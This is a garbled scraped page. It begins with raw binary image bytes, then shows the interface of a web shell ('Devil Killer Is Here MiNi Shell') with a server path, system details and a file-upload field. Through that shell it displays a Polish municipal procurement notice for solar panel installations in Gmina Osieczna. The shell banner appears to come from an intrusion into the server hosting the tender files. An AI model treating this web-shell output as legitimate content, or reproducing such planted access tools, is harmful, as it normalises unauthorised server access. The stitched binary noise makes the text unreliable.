JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231128/0051789801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna <br/>oraz stacji ujęcia wody w m.Klaniny </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Osieczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675735</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac 1000-lecia 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Osieczna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">83-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@gminaosieczna.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugosieczna.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna <br/>oraz stacji ujęcia wody w m.Klaniny </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a382b275-8dc1-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00517898</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00047554/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna oraz ujęcia wody w m. Klaniny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-osieczna.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://gmina-osieczna.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej https://gmina-osieczna.ezamawiajacy.pl <br/>2.	Oferty, oświadczenia, sporządza się pod rygorem nieważności, w postaci elektronicznej i opatruje się jednym z poniższych sposobów:<br/>	kwalifikowanym podpisem elektronicznym,<br/>	podpisem zaufanym,<br/>	elektronicznym podpisem osobistym.<br/>3.	Sposób sporządzenia oraz sposób przekazywania ofert, oświadczeń, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia, wymagania techniczne dla dokumentów elektronicznych, wymagania techniczne i organizacyjne użycia środków komunikacji elektronicznej służące do odbioru dokumentów elektronicznych, jak również sposób ich sporządzenia określa rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. <br/>w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu <br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>4.	Ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa się pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym zgodnie z art. 63 ust. 2 ustawy Pzp. <br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na platformie zakupowej https://gmina-osieczna.ezamawiajacy.pl <br/>W zakładce Baza wiedzy znajduje się szczegółowa instrukcja odnośnie założenia konta przez Wykonawcę (Instrukcja dla Wykonawcy).<br/>6.	Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 7 niniejszego Rozdziału:<br/>1)	Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na stronie Gminy Osieczna: https://gmina-osieczna.ezamawiajacy.pl lub https://oneplace.marketplanet.pl .<br/>2)	Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany na stronę https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>3)	Rejestracja konta następuje automatycznie poprzez:<br/>a)	podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym)<br/>lub<br/>b)	kontakt z numerem telefonu podanym w potwierdzeniu<br/>lub<br/>c)	jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie, konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>4)	Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem sekcji „Korespondencja”.<br/>7.	Wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>3)	zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>5)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/><br/>Pozostałe informacje znajdują się w Rozdz. VIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna (Informacje podawane w przypadku zbierania danych osobowych od osoby, której dane dotyczą) zawarte są w Rozdziale XXIV SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna (Informacje podawane w przypadku zbierania danych osobowych od osoby, której dane dotyczą) zawarte są w Rozdziale XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP.271.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna oraz stacji ujęcia wody w m.Klaniny.<br/><br/>2.	Przedmiot zamówienia szczegółowo został określony w opisie przedmiotu zamówienia, dokumentacji postępowania, specyfikacjach technicznych wykonania i odbioru robót oraz pomocniczo w przedmiarach robót, stanowiących Załącznik nr 7 do SWZ.<br/><br/>3.	Charakterystyka zadania:<br/><br/>Zadanie 1. Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna<br/>Budowa instalacji fotowoltaicznej dla budynku Urzędu Gminy Osieczna o mocy do 18 kWp na trzech wiatach drewnianych do 35m2 każda.<br/>Planowana inwestycja to Budowa trzech wiat o konstrukcji drewnianej o wymiarach 5,63x4,60m i wysokości 4,8m., fundamenty: stopy fundamentowe żelbetowe, dach jednospadowy wykonany z paneli fotowoltaicznych, posadzka z kostki betonowej. Powierzchnia zabudowy jednej z trzech identycznych wiat 25,90m2.<br/> <br/>1. INSTALACJA FOTOWOLTAICZNA<br/>a)	Panele fotowoltaiczne o mocy 540 Wp-33 szt.<br/>b)	Falownik 20kW-1szt.<br/>c)	Zabezpieczenie p.poż, ograniczniki przepięć, zabezpieczenia nadprądowe- 1szt.<br/>d)	Kamera monitoringu na budynku stacji i konstrukcji naziemnej- 2szt.<br/>e)	Oświetlenie konstrukcji lampą z czujnikiem ruchu-1szt.<br/>f)	Pomiary instalacji fotowoltaicznej<br/>g)	Podłączenie instalacji fotowoltaicznej do sieci elektroenergetycznej wraz z uruchomieniem -1kpl.<br/>2. WIATA O KONSTRUKCJI DREWNIANEJ O WYMIARACH 5,63m*4,6m – 3szt.<br/>a)	Roboty ziemne z przewozem ziemi na odl. Do 20m.- 54m3<br/>b)	Ławy fundamentowe żelbetowe pod słupy-4,86m3<br/>c)	Krokwie 14*7cm- 1,399m3<br/>d)	Miecze, Zastrzały, Słupy 14*14cm, Płatwie 14*14cm- 15,146m3<br/>e)	Ołacenie połaci dachowychłatami 38*50mm-102m2<br/>f)	Nawierzchnia z kostki betonowej na podbudowie z kruszywa łamanego gr. 20cm i pospółki gr. 10cm. -67,26m2<br/>g)	Krawężniki betonowe wtopione na ławie betonowej -18mb<br/>h)	Obrzeża betonowe 30*8cm na podsypce cementowo- piaskowej -54mb<br/>i)	Rusztowania ramowe warszawskie- 72m2<br/>j)	Lampa zewnętrzna -1szt.<br/>k)	Dwukrotne malowanie konstrukcji drewnianej- 100m2<br/>l)	Montaż prefabrykowanych rynien dachowych- 15mb<br/>m)	Montaż rur spustowych o śr. 12cm- 9mb.<br/><br/>Zadanie 2. Budowa instalacji fotowoltaicznej dla stacji ujęcia wody w m.Klaniny<br/>Budowa instalacji fotowoltaicznej dla budynku stacji ujęcia wody w m.Klaniny o mocy do 9,9 kWp na konstrukcji naziemnej oraz termomodernizacja budynku stacji i przebudowa ogrodzenia.<br/>Planowana inwestycja to Budowa instalacji fotowoltaicznej dla budynku stacji ujęcia wody w miejscowości Klaniny (konstrukcja naziemna o wymiarach 11,75x4,2m; wysokość 2,9m’ nachylenie 25 stopni, panele fotowoltaiczne o mocy 450 kWp-22 szt. Falownik 10kW, zabezpieczenie p.poż. przepięć i nadprądowe, kamera monitoringu-2 szt. oświetlenie lampa z czujnikiem ruchu-1 szt.) termomodernizacja budynku stacji uzdatniania wody (ocieplenie styropianem gr. 15 cm, wymiana stolarki okiennej i drzwiowej, daszek nad wejściem, montaż rynien dachowych i rur spustowych odmalowanie elewacji, instalacja odgromowa) i przebudowa ogrodzenia (demontaż istniejącego ogrodzenia wraz z bramą i furtką oraz montaż nowego ogrodzenia panelowego wraz z bramą i furtką, podmurówka betonowa). Wymiary budynku hydroforni Klaniny: Długość 5,30m; Szerokość 5,35m; Wysokość budynku 4,96m.<br/>1. ROBOTY ROZBIÓRKOWE<br/>a)	Wykucie z muru krat stalowych wraz z ponownym montażem- 4szt.<br/>b)	Wykucie z muru drzwi drewnianych i skrzydeł drzwiowych o wym. 1,8*2,2m.-1szt.<br/>c)	Demontaż okien drewnianych-4szt.<br/>d)	Rozbiórka obróbek blacharskich-10m2<br/>e)	Demontaż daszków nad wejsciem-1szt.<br/>f)	Demontaż obróbek blacharskich- parapety zewnętrzne-3m2<br/>g)	Demontaż rur spustowych-6 mb.<br/>h)	Demontaż rynien dachowych-13 mb.<br/>i)	Demontaż świetlików- 2szt. o wym. 5*1,5m<br/>2. STOLARKA OKIENNA I PARAPETY<br/>a)	Okna z PCV z obróbka obsadzenia-4m2<br/>b)	drzwi dwuskrzydłowe zewnętrzne aluminiowe profil ciepły-1 szt. ( wymiary: 1,8*2,2m. )<br/>c)	Obróbki blacharskie- parapety zewnętrzne-15m2<br/>d)	Obróbki blacharskie z blachy powlekanej-10m2<br/>3. ELEWACJA<br/>a)	Osłony okien folią -7,96 m2<br/>b)	Montaż listwy przyokiennej APu-30,6 m<br/>c)	Ocieplenie ścian- zamocowanie listwy cokołowej-21,3.mb<br/>d)	Oczyszczanie mechaniczne podłoża i zagruntowanie – 72,1m2<br/>e)	Ocieplenie ścian zewnętrznych styropianem gr. 15cm , warstwa siatki wraz z masą podkładową i zagruntowaniem -64,14m2<br/>f)	Ocieplenie ścian -ościeża –styropian z 1 warstwą siatki -10,4 m2<br/>g)	Spadki pod obróbki blacharskie-2,4 m2<br/>h)	Mocowanie płyt styropianowych dyblami-256,56 szt.<br/>i)	Ocieplenie ścian-ochrona narożników kątownikiem-39 mb.<br/>j)	Wyprawy elewacyjna na ścianach z tynku mineralnego-64,14.m2<br/>k)	Wyprawy elewacyjna na ościeżach z tynku mineralnego- 6,78m2<br/>l)	Oczyszczanie mechaniczne i zmycie elewacji-ościeża-6,78 m2<br/>m)	Malowanie elewacji farbą silikatową dwukrotne tynk fakturowy-70,94m2<br/>n)	Malowanie elewacji farbą silikatową dwukrotne tynk fakturowy-ościeża-6,8 m2<br/>o)	Dwukrotne malowanie drewnianych powierzchni z dwukrotnym szpachlowaniem-podbitka drewniana – 12,3 m2<br/>4. ROBOTY UZUPEŁNIAJĄCE<br/>a)	montaż rynien dachowych o śr. 15cm- 13 mb<br/>b)	Montaż rur spustowych o śr. 12cm- 6,0 mb<br/>c)	Wymiana instalacji odgromowej-46,6 mb<br/>d)	Lampy zewnętrzne-1 szt.<br/>e)	Dwukrotne malowanie farbą olejną krat okiennych- 10m2<br/>f)	Montaż daszka nad wejściem szer. 2,5m wykonany z poliweglanu-1 szt.<br/>5. ELEMENTY UZUPEŁNIAJĄCE+ RUSZTOWANIA<br/>a)	Rusztowania ramowe warszawskie wysokości do 10m. wraz z kurtynami osłonowymi mocowanymi na rusztowaniach-96m2<br/>b)	wyprawa elewacyjna-masa podkładowa-cokół budynku+boki schodów- 7,94m2<br/>c)	wykonanie tynku żywicznego- 7,94 m2<br/>d)	Okładziny schodów oraz podestu przed wejściem głównym z granitu- 4,76 m2<br/>6. INSTALACJA FOTOWOLTAICZNA<br/>a)	Wykonanie konstrukcji naziemnej o wymiarach 11.75*4,2m. Wysokość konstrukcji 2,9m. nachylonej pod katem 25 stopni zgodnie z dokumentacja projektową-1kpl.<br/>b)	Panele fotowoltaiczne o mocy 450kWp-22 szt.<br/>c)	Falownik 10kW-1szt.<br/>d)	Zabezpieczenie p.poż, ograniczniki przepięć, zabezpieczenia nadprądowe- 1szt.<br/>e)	Kamera monitoringu na budynku stacji i konstrukcji naziemnej- 2szt.<br/>f)	Oświetlenie konstrukcji lampą z czujnikiem ruchu-1szt.<br/>g)	Pomiary instalacji fotowoltaicznej<br/>h)	Podłączenie instalacji fotowoltaicznej do sieci elektroenergetycznej wraz z uruchomieniem -1kpl.<br/>7.	OGRODZENIE<br/>a)	Demontaż siatki ogrodzeniowej , słupków , bramy wjazdowej i furtki wraz z utylizacja i wywozem elementów ogrodzenia-1kpl. <br/>b)	Wytyczenie ogrodzenia oraz wykonanie inwentaryzacji geodezyjnej powykonawczej-1kpl.<br/>c)	Brama panelowa dwuskrzydłowa szer. 5m i wysokości 1,5m. wraz ze słupkami wbetonowanymi do podłoża malowana proszkowo koloru zielonego wraz z klamką otwieraną na klucz-1szt.<br/>d)	Furtka panelowa szer. 1,0m. i wysokości 1,5m. wraz z słupkami wbetonowanymi do podłoża malowana proszkowo koloru zielonego wraz z klamką otwierana na klucz-1szt.<br/>e)	Ogrodzenie panelowe wraz ze słupkami , obejmami, ceownikami do łączenia podmurówki wysokości 1,53m. wraz z słupkami wbetonowanymi do podłoża malowanymi proszkowo koloru zielonego wraz z podmurówką betonową wys. 25cm.-150mb. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Przy wyborze oferty Zamawiający kierował się będzie następującymi kryteriami oceny ofert i ich wagą:<br/><br/><br/>C - Liczba punktów uzyskanych w kryterium – cena oferty – 60<br/>GP - Liczba punktów uzyskanych w kryterium – wydłużony termin gwarancji na panele fotowoltaiczne – 20 <br/>GI - Liczba punktów uzyskanych w kryterium – wydłużony termin gwarancji na inwertery - 20<br/>LP - Liczba wszystkich punktów uzyskanych przez ofertę badaną - 100<br/>Zamawiający udzieli zamówienia Wykonawcy, który złożył najkorzystniejszą z największą ilością uzyskanych punktów ofertę obejmującą realizację całości zamówienia, stanowiącą sumę punktów przyznanych w ramach każdego z podanych kryteriów udzielenia zamówienia na podstawie poniższego wzoru: LP = C + GP + GI.<br/>Szczegółowy opis sposobu oceny ofert zawarty jest w Rozdziale XVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony termin gwarancji na panele fotowoltaiczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony termin gwarancji na inwertery</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>zdolności technicznej lub zawodowej<br/><br/>Zamawiający żąda od Wykonawcy: <br/>a)	wskazania osoby (kierownika budowy), która będzie w szczególności odpowiedzialna za kierowanie robotami budowlanymi i będzie posiadała uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub równoważne oraz doświadczenie zawodowe na co najmniej jednym zadaniu, 